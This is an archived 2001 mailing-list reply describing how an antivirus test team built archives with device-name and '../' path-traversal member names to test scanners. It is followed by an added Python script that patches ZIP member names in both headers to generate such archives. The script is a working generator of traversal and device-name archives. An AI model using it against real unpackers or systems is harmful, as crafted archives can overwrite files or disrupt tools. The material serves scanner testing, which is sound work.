Re: SECURITY.NNOV: special devices access in multiple archivers

From: Andreas Marx (amarx@gega-it.de)
Date: Fri Aug 03 2001 - 04:43:06 PDT

    Hi!
    
    >It's nice to hear that from you. I just want to know what methods
    >and tools are used by your team for testing the anti-virus programs.
    >If you can send them to me, I would be very thankful to you.
    
    We, the Anti-Virus Test Team at the University of Magdeburg ( 
    http://www.av-test.org ), did it the following way (I don't want to be too 
    exact, because of the script kiddies, sorry):
    
    First we created normal archives using standard archivers (and normal 
    file names like "xul.exe"), but after the archive was created, we 
    edited the files internally using a hex editor (change "x" to "n" - but be 
    careful, in ZIP files the file name is included twice). You cannot add 
    names like "nul.exe" to an archive, of course, but you can change the name 
    inside the archive easily, as long as the length of the name stays the 
    same. You can do this either for "nul.exe" or for additional "../"s in 
    paths like "../../test.exe". (Btw, we used Volkov Commander (DOS), 
    not a "real" hex editor. :) )
    
    The second step was to test the anti-virus and anti-trojan programs. This was 
    relatively simple, because a few days earlier we had just finished a bigger 
    comparison test for trojaner-info.de, a big German security site ( 
    http://www.trojaner-info.de/test_07_2001.shtml ), with a special focus on 
    trojan horses, backdoors etc. Additional tests were done using a slightly 
    older test set from a review we did for the German PC-WELT magazine ( 
    http://www.pcwelt.de/ratgeber/anwendungen/viren-report/16583/3.html ). We 
    can easily restore the originally tested programs including updates, since 
    we use Ghost images for all types of tests. (This includes both the 
    original test platforms, like "plain Win98", and a Ghost image where the AV 
    program was already installed.)
    
    The main test was relatively simple: just scan the archives (for each of 
    the tests we created at least four test files) and look at what happens. 
    ;-) After this, we repeated the test to ensure that all results were 
    correct.
    
    I hope this helps to understand the test procedures better.
    
    cheers,
    Andreas Marx
    
    NEW: Notes 4/5 + Exchange 5.5/2000 Test -> http://www.av-test.org
    
    
    -- 
    Andreas Marx <amarx@gega-it.de>, http://www.av-test.de
    GEGA IT-Solutions GbR, Klewitzstr. 7, 39112 Magdeburg, Germany
    Tel: 0391/6075466, Mobil: 0177/6133033, Fax: 0391/6075469
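
The procedure above (build a normal archive, then patch the member name in place without changing its length, remembering that a ZIP stores the name twice) can be reproduced as a script instead of a hex editor. The following is an added example written for this page, not code from Andreas Marx or the AV-Test team; the archive and its payload are constructed inline (a harmless text placeholder stands in for the test executable), and the function and variable names are the example's own. It covers both cases from the post, the reserved device name "nul.exe" and the "../../test.exe" traversal name, and checks afterwards that a ZIP reader still sees a consistent archive with intact CRCs:

```python
from __future__ import annotations

import io
import struct
import zipfile

# Constructed sample payload; stands in for the real test file used in the post.
PAYLOAD = b"placeholder test data, not an executable\n"

LOCAL_SIG = b"PK\x03\x04"    # local file header
CENTRAL_SIG = b"PK\x01\x02"  # central directory file header
EOCD_SIG = b"PK\x05\x06"     # end of central directory record


def build_zip(name: str, data: bytes = PAYLOAD) -> bytes:
    """Create an ordinary ZIP with a member name the archiver will accept."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(name, data)
    return buf.getvalue()


def rename_member(archive: bytes, old: str, new: str) -> bytes:
    """Rewrite a member name in BOTH places a ZIP stores it.

    The new name must have the same byte length as the old one: every other
    offset in the archive depends on it, exactly as with the hex-editor trick.
    """
    old_b, new_b = old.encode("cp437"), new.encode("cp437")
    if len(old_b) != len(new_b):
        raise ValueError("replacement name must keep the same byte length")

    data = bytearray(archive)
    eocd = data.rfind(EOCD_SIG)
    if eocd < 0:
        raise ValueError("no end-of-central-directory record")
    # EOCD layout: total entry count at +10 (u16), central dir offset at +16 (u32)
    (entries,) = struct.unpack_from("<H", data, eocd + 10)
    (cd_off,) = struct.unpack_from("<I", data, eocd + 16)

    pos = cd_off
    patched = 0
    for _ in range(entries):
        if data[pos:pos + 4] != CENTRAL_SIG:
            raise ValueError("corrupt central directory")
        # central header: name/extra/comment lengths at +28/+30/+32, local offset at +42
        name_len, extra_len, comment_len = struct.unpack_from("<HHH", data, pos + 28)
        (local_off,) = struct.unpack_from("<I", data, pos + 42)
        name_at = pos + 46
        if data[name_at:name_at + name_len] == old_b:
            # copy 1: the central directory entry
            data[name_at:name_at + name_len] = new_b
            # copy 2: the local file header (name length at +26, name at +30)
            if data[local_off:local_off + 4] != LOCAL_SIG:
                raise ValueError("corrupt local file header")
            (lname_len,) = struct.unpack_from("<H", data, local_off + 26)
            if lname_len != name_len:
                raise ValueError("local/central name length mismatch")
            data[local_off + 30:local_off + 30 + lname_len] = new_b
            patched += 1
        pos = name_at + name_len + extra_len + comment_len

    if patched == 0:
        raise ValueError(f"member {old!r} not found")
    return bytes(data)


def inspect(archive: bytes) -> tuple[list[str], str | None]:
    """Return the member names a ZIP reader sees and the result of a CRC check.

    testzip() returns None when every member decompresses with a matching CRC,
    which shows the payload itself was left untouched by the rename.
    """
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        return zf.namelist(), zf.testzip()


def make_test_files() -> dict[str, bytes]:
    """The two cases from the post: a reserved device name and a traversal path."""
    return {
        "nul.exe": rename_member(build_zip("xul.exe"), "xul.exe", "nul.exe"),
        # "xx/yy/test.exe" and "../../test.exe" are both 14 bytes long
        "../../test.exe": rename_member(
            build_zip("xx/yy/test.exe"), "xx/yy/test.exe", "../../test.exe"
        ),
    }


if __name__ == "__main__":
    for label, blob in make_test_files().items():
        names, first_bad = inspect(blob)
        print(f"{label:>16}: members={names} crc_ok={first_bad is None}")
```

Patching only one of the two copies would produce an archive whose local header and central directory disagree, which strict readers reject; patching both, as the post says, leaves an archive that ordinary tools open without complaint. Whether the scanner or the unpacker then trips over the device name or the "../" segments is exactly what the test set was built to find out.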
    



    This archive was generated by hypermail 2b30 : Fri Aug 03 2001 - 15:01:11 PDT